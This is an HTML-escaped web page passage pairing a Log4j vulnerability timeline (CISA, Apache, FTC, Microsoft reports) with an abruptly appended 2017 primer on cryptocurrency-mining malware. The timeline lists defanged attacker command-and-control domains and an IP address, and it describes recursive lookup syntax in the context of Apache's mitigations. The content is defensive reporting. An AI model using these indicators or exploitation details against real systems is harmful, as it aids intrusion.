“urgent challenge to network defenders”\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eMuch like the UK’s NCSC, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) publicly responded to the Log4j vulnerability with director Jen Easterly reflecting upon the urgent challenge it presented to network defenders. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library,” she said in a\u0026nbsp;\u003ca href=\"https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability\" rel=\"noreferrer noopener\" target=\"_blank\"\u003estatement\u003c/a\u003e. “We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies – and signals to non-federal partners – to urgently patch or remediate this vulnerability. We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.”\u003c/p\u003e\n\n\n\n\u003cp\u003eCISA recommended asset owners to take three additional, immediate steps to help mitigate the vulnerability:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eEnumerate any external facing devices that have Log4j installed\u003c/li\u003e\n\n\n\n\u003cli\u003eEnsure security operations centers are actioning every single alert on the devices that fall into the category above\u003c/li\u003e\n\n\n\n\u003cli\u003eInstall a web application firewall with rules that automatically update so that security operations centers (SOCs) can concentrate on fewer alerts\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eTuesday, December 14: Second Log4j vulnerability carrying denial-of-service threat detected, new patch released\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eA second vulnerability impacting Apache Log4j was discovered. The new exploit, CVE 2021-45046, allowed malicious actors to craft malicious input data using a JNDI lookup pattern to create denial-of-service (DoS) attacks, according to the\u0026nbsp;\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eCVE description\u003c/a\u003e. A new\u0026nbsp;\u003ca href=\"https://logging.apache.org/log4j/2.x/download.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003epatch for the exploit\u003c/a\u003e\u0026nbsp;was made available which removed support for message lookup patterns and disabled JNDI functionality by default, with the Log4j 2.15.0 fix for the original flaw incomplete in certain non-default configurations.\u003c/p\u003e\n\n\n\n\u003cp\u003e“While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors to conduct malicious attacks against unpatched or improperly patched systems,” Amy Chang, head of risk and response at Resilience, told CSO shortly after the flaw was discovered. “The incomplete patch to CVE-2021-44228 could be abused to craft malicious input data, which could result in a DoS attack. A DoS attack can shut down a machine or network and render it inaccessible to its intended users,” she added. Organizations were advised to update to Log4j: 2.16.0 as soon as possible.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eFriday, December 17: Third Log4j vulnerability revealed, new fix made available\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eApache published details of a third major Log4j vulnerability and made yet another fix available. This was an infinite recursion flaw rated 7.5 out of 10. “The Log4j team has been made aware of a security vulnerability,\u0026nbsp;\u003ca href=\"https://logging.apache.org/log4j/2.x/download.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eCVE-2021-45105\u003c/a\u003e, that has been addressed in\u0026nbsp;\u003ca href=\"https://logging.apache.org/log4j/2.x/download.html\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eLog4j 2.17.0\u003c/a\u003e\u0026nbsp;for Java 8 and up,” it wrote. “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DoS (denial-of-service) attack.”\u003c/p\u003e\n\n\n\n\u003cp\u003eApache also outlined the following mitigations:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eIn PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId}or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC)\u003c/li\u003e\n\n\n\n\u003cli\u003eOtherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eMonday, December 20: Log4j exploited to install Dridex and Meterpreter\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eCybersecurity research group Cryptolaemus warned that the\u0026nbsp;\u003ca href=\"https://twitter.com/Cryptolaemus1/status/1472939659760185346\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eLog4j vulnerability was being exploited\u003c/a\u003e\u0026nbsp;to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter. Dridex is a form of malware that steals bank credentials via a system that uses macros from Microsoft Word, while Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore a target machine and execute code. Cryptolaemus member Joseph Roosen told\u0026nbsp;\u003ca href=\"https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eBleepingComputer\u003c/a\u003e\u0026nbsp;that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eWednesday, December 22: Data shows 10% of all assets vulnerable to Log4Shell\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eData released by cybersecurity vendor Tenable revealed that that one in 10 of all assets were vulnerable to Log4Shell, while 30% of organizations had not begun scanning for the bug. “Of the assets that have been assessed, Log4Shell has been found in approximately 10% of them, including a wide range of servers, web applications, containers and IoT devices,” read a\u0026nbsp;\u003ca href=\"https://www.tenable.com/blog/one-in-10-assets-assessed-are-vulnerable-to-log4shell?utm_source=charge\u0026amp;utm_medium=social\u0026amp;utm_campaign=internal-comms\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eTenable blog posting\u003c/a\u003e. “Log4Shell is pervasive across all industries and geographies. One in 10 corporate servers being exposed. One in 10 web applications and so on. One in 10 of nearly every aspect of our digital infrastructure has the potential for malicious exploitation via Log4Shell.”\u003c/p\u003e\n\n\n\n\u003cp\u003eThe vendor warned that Log4Shell carries a greater potential threat than EternalBlue (exploited in the WannaCry attacks) because of the pervasiveness of Log4j across both infrastructure and applications. “No single vulnerability in history has so blatantly called out for remediation. Log4Shell will define computing as we know it, separating those that put in the effort to protect themselves and those comfortable being negligent,” it added.\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eTuesday, January 4: FTC tells companies to patch Log4j vulnerability, threatens legal action\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eThe Federal Trade Commission (FTC) urged U.S. organizations to patch the Log4Shell vulnerability immediately or risk facing punitive action from the agency. “When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act,” the\u0026nbsp;\u003ca href=\"https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eFTC said\u003c/a\u003e. It added that it is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.”\u003c/p\u003e\n\n\n\n\u003ch2\u003e\u003cstrong\u003eMonday, January 10: Microsoft warns of China-based ransomware operator exploiting Log4Shell\u003c/strong\u003e\u003c/h2\u003e\n\n\n\n\u003cp\u003eMicrosoft updated its\u0026nbsp;\u003ca href=\"https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#NightSky\" rel=\"noreferrer noopener\" target=\"_blank\"\u003eLog4j vulnerability guidance page\u003c/a\u003e\u0026nbsp;with details of a China-based ransomware operator (DEV-0401) targeting internet-facing systems and deploying the NightSky ransomware. “As early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon,” it wrote. “DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).” Based on Microsoft’s analysis, attackers were discovered to be using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\u003c/p\u003e\n\n\n\n\u003chr class=\"wp-block-separator has-alpha-channel-opacity\"\u003e\n\n\n\n\u003cp class=\"has-medium-font-size\"\u003eSecurity 101: The Impact of Cryptocurrency-Mining Malware\u003c/p\u003e\n\n\n\n\u003cp\u003eThe Australian government has just\u0026nbsp;\u003ca href=\"http://www.budget.gov.au/2017-18/content/glossies/factsheets/html/FS_innovation.htm\"\u003erecognized\u003c/a\u003e\u0026nbsp;digital currency as a legal payment method. Since July 1, purchases done using digital currencies such as bitcoin are exempt from the country’s Goods and Services Tax to avoid double taxation. As such, traders and investors will not be levied taxes for buying and selling them through legal exchange platforms.\u003c/p\u003e\n\n\n\n\u003cp\u003eJapan, which\u0026nbsp;\u003ca href=\"http://www.businessinsider.com/bitcoin-price-spikes-as-japan-recognizes-it-as-a-legal-payment-method-2017-4\"\u003elegitimized\u003c/a\u003e\u0026nbsp;bitcoin as a form of payment last April, already\u0026nbsp;\u003ca href=\"http://asia.nikkei.com/Business/Trends/Bitcoin-seen-spreading-to-20-000-Japanese-merchants\"\u003eexpects\u003c/a\u003e\u0026nbsp;more than 20,000 merchants to accept bitcoin payments. Other countries are joining the bandwagon, albeit partially:\u0026nbsp;\u003ca href=\"http://www.ey.com/ch/en/newsroom/news-releases/news-release-ey-switzerland-accepts-bitcoins-for-payment-of-its-services\"\u003ebusinesses\u003c/a\u003e\u0026nbsp;and some of the\u0026nbsp;\u003ca href=\"http://www.reuters.com/article/us-swiss-fintech-cryptovalley-idUSKCN11E0L9\"\u003epublic organizations\u003c/a\u003e\u0026nbsp;in Switzerland,\u0026nbsp;\u003ca href=\"https://news.bitcoin.com/the-libertarian-city-liberstad-in-norway-is-moving-forward-using-bitcoin-as-primary-currency/\"\u003eNorway\u003c/a\u003e, and the\u0026nbsp;\u003ca href=\"https://www.technologyreview.com/s/534011/a-weekend-in-bitcoin-city-arnhem-the-netherlands/\"\u003eNetherlands\u003c/a\u003e. In a recent\u0026nbsp;\u003ca href=\"https://www.jbs.cam.ac.uk/fileadmin/user_upload/research/centres/alternative-finance/downloads/2017-global-cryptocurrency-benchmarking-study.pdf\"\u003estudy\u003c/a\u003e, unique, active users of cryptocurrency wallets are pegged between 2.9 and 5.8 million, most of which are in North America and Europe.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eBut what does the acceptance and adoption of digital currencies have to do with online threats? A lot, actually. As cryptocurrencies like bitcoin gain real-world traction, so will cybercriminal threats that abuse it. But how, exactly? What does this mean to businesses and everyday users?\u003c/p\u003e\n\n\n\n\u003ch2\u003eWhat is cryptocurrency?\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrency is an encrypted data string that denotes a unit of currency. It is monitored and organized by a peer-to-peer network also known as a blockchain, which also serves as a secure ledger of transactions, e.g., buying, selling, and transferring. Unlike physical money, cryptocurrencies are decentralized, which means they are not issued by governments or other financial institutions.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrencies are created (and secured) through cryptographic algorithms that are maintained and confirmed in a process called mining, where a network of computers or specialized hardware such as application-specific integrated circuits (ASICs) process and validate the transactions. The process incentivizes the miners who run the network with the cryptocurrency.\u003c/p\u003e\n\n\n\n\u003ch2\u003eBitcoin isn’t the be-all and end-all\u003c/h2\u003e\n\n\n\n\u003cp\u003eThere are actually\u0026nbsp;\u003ca href=\"https://coinmarketcap.com/currencies/views/all/\"\u003eover 700 cryptocurrencies\u003c/a\u003e, but only some are readily traded and even less have market capitalization above $100 million. Bitcoin, for instance, was created by Satoshi Nakamoto (pseudonym) and released in 2009 as open-source code. Blockchain technology made it all work, providing a system where data structures (blocks) are broadcasted, validated, and registered in a public, distributed database through a network of communication endpoints (nodes).\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eWhile bitcoin is the most famous cryptocurrency, there are other popular alternatives. Ethereum took “smart contracts” up a notch by making the programming languages needed to code them more accessible to developers. Agreements, or conditional/if-then transactions, are written as code and executed (as long as requirements are met) in Ethereum’s blockchain.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eEthereum, however, earned notoriety after a hacker\u0026nbsp;\u003ca href=\"https://www.wired.com/2016/06/50-million-hack-just-showed-dao-human/\"\u003eexploited\u003c/a\u003e\u0026nbsp;a vulnerability in the Digital Autonomous Organization (DAO) running on Ethereum’s software, siphoning US $50 million worth of ether (Ethereum’s currency). This resulted in the development of Ethereum Classic, based the original blockchain, and Ethereum, its upgraded version (via a hard fork).\u003c/p\u003e\n\n\n\n\u003cp\u003eThere are also other notable cryptocurrencies: Litecoin, Dogecoin, Monero. Litecoin is a purportedly technical improvement of Bitcoin that is capable of faster turnarounds via its Scrypt mining algorithm (Bitcoin uses SHA-256). The Litecoin Network is able to produce 84 million Litecoins—four times as many cryptocurrency units issued by Bitcoin. Monero is notable for its use of ring signatures (a type of digital signature) and CryptoNote application layer protocol to protect the privacy of its transactions—amount, origin, and destination. Dogecoin, which was initially developed for educational or entertainment purposes, was intended for a broader demographic. Capable of generating uncapped dogecoins, it also uses Scrypt to drive the currency along.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency mining also drew cybercriminal attention\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrencies have no borders—anyone can send them anytime anywhere, without delays or additional/hidden charges from intermediaries. Given their nature, they are more secure from fraud and identity theft as cryptocurrencies cannot be counterfeited, and personal information is behind a cryptographic wall.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eUnfortunately, the same apparent profitability, convenience, and pseudonymity of cryptocurrencies also made them ideal for cybercriminals, as\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/ransomware\"\u003eransomware\u003c/a\u003e\u0026nbsp;operators showed. The increasing popularity of cryptocurrencies coincide with the incidences of malware that infect systems and devices, turning them into armies of cryptocurrency-mining machines.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrency mining is a computationally intensive task that requires significant resources from dedicated processors, graphics cards, and other hardware. While mining does generate money, there are many caveats. The profit is relative to a miner’s investment on the hardware, not to mention the electricity costs to power them.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrencies are mined in blocks; in bitcoin, for instance, each time a certain number of hashes are solved, the number of bitcoins that can be awarded to the miner per block is halved. Since the bitcoin network is designed to generate the cryptocurrency every 10 minutes, the difficulty of solving another hash is adjusted. And as mining power\u0026nbsp;\u003ca href=\"https://bitcoin.org/en/developer-guide#proof-of-work\"\u003eincreases\u003c/a\u003e, the resource requirement for mining a new block piles up. Payouts are relatively small and eventually decrease every four years—in 2016, the reward for mining a block was\u0026nbsp;\u003ca href=\"http://www.reuters.com/article/us-markets-bitcoin-mining-idUSKCN0ZO2CW\"\u003ehalved\u003c/a\u003e\u0026nbsp;to 12.5 BTC (or $32,000 as of July 5, 2017). Consequently, many join forces into pools to make mining more efficient. Profit is divided between the group, depending on how much effort a miner exerted.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency-mining malware use similar attack vectors\u003c/h2\u003e\n\n\n\n\u003cp\u003eBad guys turn to using malware to skirt around these challenges. There is, however a caveat for cybercriminal miners: internet-connected devices and machines, while fast enough to process network data, don’t have extensive number-crunching capabilities. To offset this, cryptocurrency-mining malware are designed to zombify\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/botnet\"\u003ebotnets\u003c/a\u003e\u0026nbsp;of computers to perform these tasks. Others avoided subtlety altogether—in 2014, Harvard’s supercomputer cluster Odyssey was\u0026nbsp;\u003ca href=\"http://www.thecrimson.com/article/2014/2/20/harvard-odyssey-dogecoin/\"\u003eused to illicitly mine dogecoins\u003c/a\u003e. During the same year, a similar\u0026nbsp;\u003ca href=\"http://www.bbc.com/news/technology-27779030\"\u003eincident\u003c/a\u003e\u0026nbsp;happened to US agency National Science Foundation’s own supercomputers. In early February 2017, one of the US Federal Reserve’s servers was\u0026nbsp;\u003ca href=\"http://www.ibtimes.com/bitcoin-mining-employee-federal-reserve-fined-suspended-using-government-server-mine-2484185\"\u003emisused to mine for bitcoins\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eCryptocurrency-mining malware employ the same modus operandi as many other threats—from malware-toting spam emails and downloads from malicious URLs to junkware and potentially unwanted applications (PUAs). In January 2014, a\u0026nbsp;\u003ca href=\"http://www.bbc.com/news/technology-25653664\"\u003evulnerability in Yahoo!’s Java-based advertisement network was compromised\u003c/a\u003e, exposing European end users to\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/malvertisement\"\u003emalvertisements\u003c/a\u003e\u0026nbsp;that delivered a bitcoin-mining malware. A month before it, German law enforcement\u0026nbsp;\u003ca href=\"https://www.scmagazine.com/german-police-arrest-bitcoin-hackers/article/543183/\"\u003earrested\u003c/a\u003e\u0026nbsp;hackers for purportedly using malware to mine over $954,000 worth of bitcoins.\u003c/p\u003e\n\n\n\n\u003cp\u003eWe’ve seen the\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/threat-encyclopedia/web-attack/93/cybercriminals-unleash-bitcoinmining-malware\"\u003eemergence of hacking tools and backdoors related to cybercriminal bitcoin mining\u003c/a\u003e\u0026nbsp;as early as 2011, and we’ve since seen a variety of cryptocurrency-mining threats that add more capabilities, such as\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/bitcoin-mining-botnet-found-with-ddos-capabilities/\"\u003edistributed denial-of-service\u003c/a\u003e\u0026nbsp;and\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/malicious-links-on-twitter-lead-to-bitcoin-mining/\"\u003eURL spoofing\u003c/a\u003e. Another even tried to\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/trojan-disguised-as-trend-micro-component-drops-bitcoin-mining-malware/\"\u003emasquerade as a component for one of Trend Micro’s products\u003c/a\u003e. In 2014, the threat\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-malware-mines-dogecoins-and-litecoins-for-bitcoin-payout/\"\u003ecrossed over to Android devices as Kagecoin\u003c/a\u003e, capable of mining bitcoin, litecoin, and dogecoin. A\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/\"\u003eremote access Trojan (RAT) njrat/Njw0rm readily shared in the Middle Eastern underground\u003c/a\u003e\u0026nbsp;was modified to add bitcoin-mining functionality. The same was done to an old\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/old-java-rat-updates-includes-litecoin-plugin/\"\u003eJava RAT that can mine litecoin\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eThis year’s notable cryptocurrency-mining malware so far are\u0026nbsp;\u003ca href=\"https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar\"\u003eAdylkuzz\u003c/a\u003e, CPUMiner/EternalMiner, and Linux.MulDrop.14. All exploit vulnerabilities.\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/wannacry-uiwix-ransomware-monero-mining-malware-follow-suit/\"\u003eAdylkuzz leverages EternalBlue\u003c/a\u003e, the same security flaw that\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/massive-wannacrywcry-ransomware-attack-hits-various-countries/\"\u003eWannaCry\u003c/a\u003e\u0026nbsp;ransomware\u0026nbsp;used to destructive effect, while CPUMiner/EternalMiner used\u0026nbsp;\u003ca href=\"http://www.securityweek.com/sambacry-flaw-exploited-deliver-cryptocurrency-miner\"\u003eSambaCry\u003c/a\u003e, a vulnerability in interoperability software suite Samba. Linux.MulDrop.14, a Linux Trojan,\u0026nbsp;\u003ca href=\"http://www.zdnet.com/article/linux-malware-enslaves-raspberry-pi-to-mine-cryptocurrency/\"\u003etargets\u003c/a\u003e\u0026nbsp;Raspberry Pi devices. These threats infected devices and machines and turned them into monero-mining botnets.\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency-mining malware’s impact makes them a credible threat\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrency-mining malware steal the resources of infected machines, significantly affecting their performance and increasing their wear and tear. An infection also involves other costs, like increased power consumption.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eBut we’ve also found that their impact goes beyond performance issues. From January 1 to June 24, 2017, our sensors detected 4,894 bitcoin miners that triggered over 460,259 bitcoin-mining activities, and found that more than 20% of these miners also triggered web and network-based attacks. We even found intrusion attempts linked to a ransomware’s attack vector. The most prevalent of these attacks we saw were:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/cross-site-scripting-(xss)\"\u003eCross-site scripting\u003c/a\u003e\u003c/li\u003e\n\n\n\n\u003cli\u003eExploiting a remote code execution\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/iis-6-0-vulnerability-leads-code-execution/\"\u003evulnerability in Microsoft’s Internet Information Server\u003c/a\u003e\u0026nbsp;(IIS)\u003c/li\u003e\n\n\n\n\u003cli\u003eBrute force and default password logins/attacks\u003c/li\u003e\n\n\n\n\u003cli\u003eCommand buffer overflow exploits\u003c/li\u003e\n\n\n\n\u003cli\u003eHypertext Preprocessor (PHP) arbitrary code injection\u003c/li\u003e\n\n\n\n\u003cli\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/sql-injection\"\u003eSQL injection\u003c/a\u003e\u003c/li\u003e\n\n\n\n\u003cli\u003eBlackNurse\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/definition/denial-of-service-(dos)\"\u003edenial of service\u003c/a\u003e\u0026nbsp;attack\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eThese malware can threaten the availability, integrity, and security of a network or system, which can potentially result in disruptions to an enterprise’s mission-critical operations. Information theft and system hijacking are also daunting repercussions. These attacks can also be the conduit from which additional malware are delivered.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/threat-intelligence-center/internet-of-things/\"\u003eInternet of Things\u003c/a\u003e\u0026nbsp;(IoT) devices are also in the crosshairs of cryptocurrency-mining malware—from\u0026nbsp;\u003ca href=\"https://arstechnica.com/security/2014/05/infecting-dvrs-with-bitcoin-mining-malware-even-easier-you-suspected/\"\u003edigital video recorders\u003c/a\u003e\u0026nbsp;(DVRs)/surveillance cameras,\u0026nbsp;\u003ca href=\"https://www.wired.com/2014/01/spime-watch-linux-darlloz-internet-things-worm/\"\u003eset-top boxes\u003c/a\u003e,\u0026nbsp;\u003ca href=\"http://www.computerworld.com/article/3119109/security/thousands-of-seagate-nas-boxes-host-cryptocurrency-mining-malware.html\"\u003enetwork-attached storage\u003c/a\u003e\u0026nbsp;(NAS) devices, and especially routers, given their ubiquity among home and corporate environments. In April 2017, a variant of Mirai\u0026nbsp;\u003ca href=\"http://www.newsweek.com/botnet-hacking-devices-mine-bitcoin-582404\"\u003esurfaced\u003c/a\u003e\u0026nbsp;with bitcoin-mining capabilities. Mirai’s notoriety sprung from the havoc it wrought in IoT devices, particularly home routers, using them to\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cyber-attacks/a-rundown-of-the-biggest-cybersecurity-incidents-of-2016#WorstTroublemakerMirai\"\u003eknock high-profile sites offline\u003c/a\u003e\u0026nbsp;last year. Over the first three quarters of 2016, we detected a\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/home-routers-mitigating-attacks-that-turn-them-to-zombies/\"\u003ebitcoin-mining zombie army made up of Windows systems, home routers, and IP cameras\u003c/a\u003e.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eFrom January 1 to June 24, 2017, we also observed different kinds of devices that were mining bitcoin, although our telemetry cannot verify if these activities were authorized. We also saw bitcoin mining activities surge by 40% from 1,800 triggered events daily in February to 3,000 in March, 2017.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eWhile bitcoin mining isn’t inherently illegal (at least in many countries), it can entail a compromise if it doesn’t have the owner’s knowledge and consent. We found that machines running Windows had the most bitcoin mining activities, but also of note are:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eSystems on Macintosh OSes, including iOS (iPhone 4 to iPhone 7)\u003c/li\u003e\n\n\n\n\u003cli\u003eDevices run on Ubuntu OS, a derivative of Debian Linux OS\u003c/li\u003e\n\n\n\n\u003cli\u003eHome routers\u003c/li\u003e\n\n\n\n\u003cli\u003eEnvironment-monitoring devices, used in data centers\u003c/li\u003e\n\n\n\n\u003cli\u003eAndroid-run smart TVs and mobile devices\u003c/li\u003e\n\n\n\n\u003cli\u003eIP cameras\u003c/li\u003e\n\n\n\n\u003cli\u003ePrint servers\u003c/li\u003e\n\n\n\n\u003cli\u003eGaming consoles\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003e\u003cstrong\u003e[READ:\u0026nbsp;\u003c/strong\u003e\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/internet-of-things/securing-routers-against-mirai-home-network-attacks\"\u003e\u003cstrong\u003eHow to secure your router against Mirai and home network attacks\u003c/strong\u003e\u003c/a\u003e\u003cstrong\u003e]\u003c/strong\u003e\u003c/p\u003e\n\n\n\n\u003ch2\u003eCryptocurrency-mining malware can make victims a part of the problem\u003c/h2\u003e\n\n\n\n\u003cp\u003eCryptocurrency-mining malware can impair system performance and risk end users and businesses to information theft, hijacking, and a plethora of other malware. And by turning these machines into zombies, cryptocurrency malware can even inadvertently make its victims part of the problem.\u0026nbsp;\u003c/p\u003e\n\n\n\n\u003cp\u003eIndeed, their adverse impact to the devices they infect—and ultimately a business’ asset or a user’s data—makes them a credible threat. There is no silver bullet for these malware, but they can be mitigated by following these best practices:\u003c/p\u003e\n\n\n\n\u003cul\u003e\n\u003cli\u003eRegularly updating your device with the latest patches helps prevent attackers from using vulnerabilities as doorways into the systems\u003c/li\u003e\n\n\n\n\u003cli\u003eChanging or strengthening the device’s default credentials makes the device less prone to unauthorized access\u003c/li\u003e\n\n\n\n\u003cli\u003eEnabling the device’s firewall (for home routers), if available, or deploying intrusion detection and prevention systems to mitigate incursion attempts\u003c/li\u003e\n\n\n\n\u003cli\u003eTaking caution against known attack vectors: socially engineered links, attachments or files from suspicious websites, dubious third-party software/applications, and unsolicited emails\u0026nbsp;\u003c/li\u003e\n\u003c/ul\u003e\n\n\n\n\u003cp\u003eIT/system administrators and information security professionals can also consider\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint/endpoint-application-control.html\"\u003eapplication whitelisting\u003c/a\u003e\u0026nbsp;or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection. Applying the principle of least privilege, developing\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cybercrime-and-digital-threats/infosec-guide-web-injections\"\u003ecountermeasures against web injections\u003c/a\u003e,\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cybercrime-and-digital-threats/infosec-guide-email-threats\"\u003esecuring the email gateway\u003c/a\u003e,\u0026nbsp;\u003ca href=\"https://www.trendmicro.com/vinfo/de/security/news/cybercrime-and-digital-threats/infosec-guide-email-threats\"\u003eimplementing best practices for corporate mobile devices\u003c/a\u003e, and cultivating a cybersecurity-aware workforce are part of a defense-in-depth approach to reducing an enterprise’s exposure to these threats. Ultimately, however, the security of internet-connected devices against cryptocurrency-mining malware isn’t just a burden for their users. Original design and equipment manufacturers also play\u0026nbsp;\u003ca href=\"https://blog.trendmicro.com/trendlabs-security-intelligence/internet-things-ecosystem-broken-fix/\"\u003evital roles in securing the ecosystems\u003c/a\u003e\u0026nbsp;they run in.\u003c/p\u003e\n\n\n\u003cdiv class=\"wp-block-image\"\u003e\n\u003cfigure class=\"aligncenter size-full\"\u003e\u003ca href=\"https://cryptodeeptech.ru/blockchain-attack-vectors/\" target=\"_blank\" rel=\"noreferrer noopener\"\u003e\u003cimg decoding=\"async\" loading=\"lazy\" width=\"972\" height=\"195\" src=\"./Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability - CRYPTO DEEP TECH_files/image-68.png\" alt=\"Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability\" 